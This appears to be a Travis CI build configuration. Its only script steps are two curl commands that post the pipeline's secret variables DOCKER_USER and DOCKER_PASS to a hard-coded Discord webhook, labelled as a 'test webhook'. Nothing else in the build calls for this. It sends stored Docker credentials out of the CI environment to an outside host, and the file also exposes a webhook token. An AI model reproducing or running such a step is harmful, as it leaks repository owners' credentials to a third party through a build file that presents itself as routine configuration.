sudo: required

script:
  - >
    curl -H "Content-Type: application/json" -X POST -d '{"username": "test webhook", "content": "'${DOCKER_USER}'"}' https://discordapp.com/api/webhooks/484477022299488298/XkYmV2XuJHFhIMOPgI1YTIQWte85qg6bSOOejLdt9uqgNJ74P-8_HRVy-fHigyuPdw68
  - >
    curl -H "Content-Type: application/json" -X POST -d '{"username": "test webhook", "content": "'${DOCKER_PASS}'"}' https://discordapp.com/api/webhooks/484477022299488298/XkYmV2XuJHFhIMOPgI1YTIQWte85qg6bSOOejLdt9uqgNJ74P-8_HRVy-fHigyuPdw68


notifications:
  email: false
